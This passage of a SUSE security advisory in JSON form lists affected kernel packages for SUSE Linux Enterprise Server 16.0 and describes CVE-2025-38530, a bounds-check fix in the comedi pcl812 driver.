"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38529"
},
{
"cve": "CVE-2025-38530",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38530"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncomedi: pcl812: Fix bit shift out of bounds\n\nWhen checking for a supported IRQ number, the following test is used:\n\n\tif ((1 \u003c\u003c it-\u003eoptions[1]) \u0026 board-\u003eirq_bits) {\n\nHowever, `it-\u003eoptions[i]` is an unchecked `int` value from userspace, so\nthe shift amount could be negative or out of bounds. Fix the test by\nrequiring `it-\u003eoptions[1]` to be within bounds before proceeding with\nthe original test. Valid `it-\u003eoptions[1]` values that select the IRQ\nwill be in the range [1,15]. The value 0 explicitly disables the use of\ninterrupts.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38530",
"url": "https://www.suse.com/security/cve/CVE-2025-38530"
},
{
"category": "external",
"summary": "SUSE Bug 1248206 for CVE-2025-38530",
"url": "https://bugzilla.suse.com/1248206"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
